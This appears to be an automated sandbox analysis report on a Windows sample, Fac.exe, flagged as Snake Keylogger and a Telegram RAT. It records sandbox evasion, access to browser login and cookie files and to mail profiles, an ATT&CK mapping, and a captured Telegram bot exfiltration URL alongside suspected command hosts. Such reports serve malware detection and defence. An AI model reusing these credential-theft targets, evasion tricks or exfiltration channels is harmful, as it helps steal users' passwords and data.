Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C38759 push ecx; ret	2_2_36C3875A
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C3875F push edx; ret	2_2_36C38762
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C38765 push edx; ret	2_2_36C38766
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C3876B push bx; ret	2_2_36C3876E
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C38769 push edx; ret	2_2_36C3876A
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C3877B push ebx; ret	2_2_36C3877E
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C38807 push 688736C3h; ret	2_2_36C38816
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37133695 push ss; retf	2_2_371336A7

Source: C:\Users\user\Desktop\Fac.exe

File created: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Fac.exe	API/Special instruction interceptor: Address: 67C7A7F
Source: C:\Users\user\Desktop\Fac.exe	API/Special instruction interceptor: Address: 2FE7A7F

Source: C:\Users\user\Desktop\Fac.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Memory allocated: 33C30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Memory allocated: 35C30000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 598562	Jump to behavior

Source: C:\Users\user\Desktop\Fac.exe

Window / User API: threadDelayed 9962

Jump to behavior

Source: C:\Users\user\Desktop\Fac.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Fac.exe

API coverage: 1.9 %

Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 5980	Thread sleep count: 9962 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe TID: 8116	Thread sleep time: -598562s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Fac.exe	Code function: 0_2_004065C7 FindFirstFileW,FindClose,	0_2_004065C7
Source: C:\Users\user\Desktop\Fac.exe	Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405996
Source: C:\Users\user\Desktop\Fac.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_00402868 FindFirstFileW,	2_2_00402868
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_004065C7 FindFirstFileW,FindClose,	2_2_004065C7
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405996

Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Thread delayed: delay time: 598562	Jump to behavior

Source: Fac.exe, 00000002.00000002.43463081751.00000000036C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Fac.exe, 00000002.00000002.43463081751.0000000003725000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWq
Source: Fac.exe, 00000002.00000002.43463081751.0000000003725000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Fac.exe	API call chain: ExitProcess graph end node			graph_0-4913
Source: C:\Users\user\Desktop\Fac.exe	API call chain: ExitProcess graph end node			graph_0-4906

Source: C:\Users\user\Desktop\Fac.exe

Code function: 0_2_70171B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_70171B63

Source: C:\Users\user\Desktop\Fac.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Fac.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Fac.exe

Process created: C:\Users\user\Desktop\Fac.exe "C:\Users\user\Desktop\Fac.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Fac.exe	Queries volume information: C:\Users\user\Desktop\Fac.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Fac.exe

Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403359

Source: C:\Users\user\Desktop\Fac.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.43474377171.0000000033C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Fac.exe PID: 6840, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Fac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Fac.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match

File source: Process Memory Space: Fac.exe PID: 6840, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.43474377171.0000000033C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Fac.exe PID: 6840, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	115 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Fac.exe	24%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll	3%	ReversingLabs

Source	Detection	Scanner	Label
http://anotherarmy.dns.army:8081	100%	Avira URL Cloud	phishing
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe
http://aborters.duckdns.org:8081	100%	Avira URL Cloud	phishing
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
http://varders.kozow.com:8081	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE	0%	Avira URL Cloud	safe
https://api.telegram	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.251.41.14	true	false	high
drive.usercontent.google.com	142.250.72.97	true	false	high
reallyfreegeoip.org	104.21.67.152	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/191.96.150.191	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2018/11/2024%20/%2016:31:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Fac.exe, 00000002.00000002.43476613162.0000000034C56000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow	Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FE2000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	Fac.exe, 00000002.00000002.43476613162.0000000034C56000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Fac.exe, 00000002.00000002.43476613162.0000000034C56000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download	Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	Fac.exe, 00000002.00000002.43474377171.0000000033CFC000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033E06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	Fac.exe, 00000002.00000002.43474377171.0000000033CFC000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033E06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://eicar.org/	Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_	Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FE2000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lB	Fac.exe, 00000002.00000002.43474377171.0000000033D87000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE	Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	Fac.exe, 00000002.00000002.43474377171.0000000033F4A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033E8F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n	Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	Fac.exe, 00000002.00000002.43474377171.0000000033D5B000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033D46000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	Fac.exe, 00000002.00000002.43474377171.0000000033C31000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	Fac.exe, 00000002.00000003.42462884484.0000000003785000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301	Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.eicar.org/download-anti-malware-testfile/:	Fac.exe, 00000002.00000002.43476613162.0000000034E38000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034DC0000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034F94000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E86000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FE2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp	Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Fac.exe, 00000002.00000002.43476613162.0000000034C56000.00000004.00000800.00020000.00000000.sdmp	false		high
